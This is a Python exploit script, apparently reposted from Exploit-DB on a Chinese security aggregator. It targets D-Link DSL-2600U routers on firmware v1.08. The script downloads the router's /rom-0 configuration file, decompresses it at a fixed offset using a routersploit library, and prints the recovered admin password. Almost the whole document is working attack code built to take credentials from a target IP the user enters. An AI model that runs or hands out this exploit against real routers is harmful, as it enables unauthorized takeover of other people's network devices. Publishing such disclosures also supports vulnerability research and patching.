[hardware] D-Link DSL2600U - 'rom-0' Admin Password Disclosure
# Exploit Title: D-Link DSL2600U - 'rom-0' Admin 2026-5-26 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:0 收藏
# Exploit Title: D-Link DSL2600U - 'rom-0' Admin 2026-5-26 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:0 收藏
# Exploit Title: D-Link DSL2600U - 'rom-0' Admin Password Disclosure
# Date: 2026-05-02
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://www.dlink.com
# Version: DSL-2600U
# Tested on: ubuntu
# CVE : N/A
# Firmware Version: v1.08
from routersploit.libs.lzs.lzs import LZSDecompress
import requests
import re
import sys
print('''
#################################################################################
# D-Link Router - 'rom-0' Admin Password Disclosure #
# BY: Amir Hossein Jamshidi #
# Mail: [email protected] #
# github: https://github.com/amirhosseinjamshidi64 #
# Usage: python expoit.py #
#################################################################################
''')
def exploit(url):
data = requests.get(f"{url}/rom-0")
#with open("data", 'wb') as f:
# f.write(data.content)
data = data.content
pos = 8568
res, win = LZSDecompress(data[pos:])
password = re.findall("([\040-\176]{5,})", res)
return password[0]
if __name__ == "__main__":
url = input("Enter Target IP (example: http://192.168.1.1): ")
print("password is: " + '\t' + exploit(url))
文章来源: https://www.exploit-db.com/exploits/52576
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh